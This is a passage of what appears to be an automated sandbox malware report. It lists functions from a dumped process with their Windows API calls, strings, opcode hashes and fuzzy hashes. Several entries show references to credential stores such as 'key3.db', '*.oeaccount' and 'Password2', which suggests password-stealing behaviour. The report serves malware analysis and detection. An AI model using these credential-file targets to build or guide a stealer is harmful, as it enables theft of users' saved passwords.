                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01653680052ABBDB11ABA59C49EFFBFBCFF06750F04402AFD05A2181D77895018BA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B6EF Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                                                                            • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                                                                            • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                            • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                            • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                          • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2374668499-0
                                                                                                                                                                                                          • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                          • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040AA94 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AACD
                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <%s>, xrefs: 0040AAFE
                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                          • API String ID: 3699762281-1998499579
                                                                                                                                                                                                          • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                          • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040979F Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                          • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409805 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                                            • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                          • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004100EC Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                                            • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                                            • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2775283111-0
                                                                                                                                                                                                          • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                          • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405F2B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(0000000A), ref: 00405F44
                                                                                                                                                                                                            • Part of subcall function 004015F3: GetDlgItem.USER32(?,?), ref: 00401603
                                                                                                                                                                                                            • Part of subcall function 004015F3: GetClientRect.USER32(?,?), ref: 00401615
                                                                                                                                                                                                            • Part of subcall function 004015F3: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167F
                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 00406003
                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 0040600E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                          • API String ID: 2498372239-3993045852
                                                                                                                                                                                                          • Opcode ID: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
                                                                                                                                                                                                          • Instruction ID: 00843a31076853278f863d8e49a3b1dedc6e53575b175ed212c8a3462f8966d2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D318F70640259BFEF229B52DC89D6F3A7CFBC5B88F10006DF401792A1CA794F51EA69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406868 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                                                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                          • String ID: C@$key3.db
                                                                                                                                                                                                          • API String ID: 1968906679-1993167907
                                                                                                                                                                                                          • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                          • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040BFC7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BFE7
                                                                                                                                                                                                          • SetFocus.USER32(?,?), ref: 0040C06F
                                                                                                                                                                                                            • Part of subcall function 0040BFB1: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040BFC0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FocusMessagePostmemset
                                                                                                                                                                                                          • String ID: +_@$l
                                                                                                                                                                                                          • API String ID: 3436799508-640399337
                                                                                                                                                                                                          • Opcode ID: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
                                                                                                                                                                                                          • Instruction ID: dfa99e5f235914639cafa3f1faff2c73f9381d0964b1719e4b49f1177e3774cc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B411A172904198CBDF209B24CC44BCA7BB9AF90304F0900F5A94C7B2D2C7B55E89CFA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                                          • API String ID: 3492281209-168460110
                                                                                                                                                                                                          • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                          • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406EA5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                          • API String ID: 275601554-2167791130
                                                                                                                                                                                                          • Opcode ID: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                                          • Instruction ID: 847e1e856ca93c5331a43762777f09d1dcd0b535ae5450603ebfd434222f9f24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3E09B73C5412E7AEB21B6A4DC01FE6776CEF55705F0000F7B945E10C1E5B45A888B95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040732D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strlen$_mbscat
                                                                                                                                                                                                          • String ID: 8D
                                                                                                                                                                                                          • API String ID: 3951308622-2703402624
                                                                                                                                                                                                          • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                                          • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00443131 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                          • String ID: Password2
                                                                                                                                                                                                          • API String ID: 2600922555-1856559283
                                                                                                                                                                                                          • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                                          • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041067E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                          • API String ID: 2574300362-543337301
                                                                                                                                                                                                          • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                          • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00431CB5 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 469COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: rows deleted
                                                                                                                                                                                                          • API String ID: 2221118986-571615504
                                                                                                                                                                                                          • Opcode ID: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                          • Instruction ID: 2c87624536f7d1d2c67b3f30ed48d8bcf82a012ac595ca9270874480dc5e5985
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47028F71E00218AFDF14DF99DD81AAEBBB5EF08314F14005AFA04A7352E775AD41CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041B58C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                          • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                          • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00442878 Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                          • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                          • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404883 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                          • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                          • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
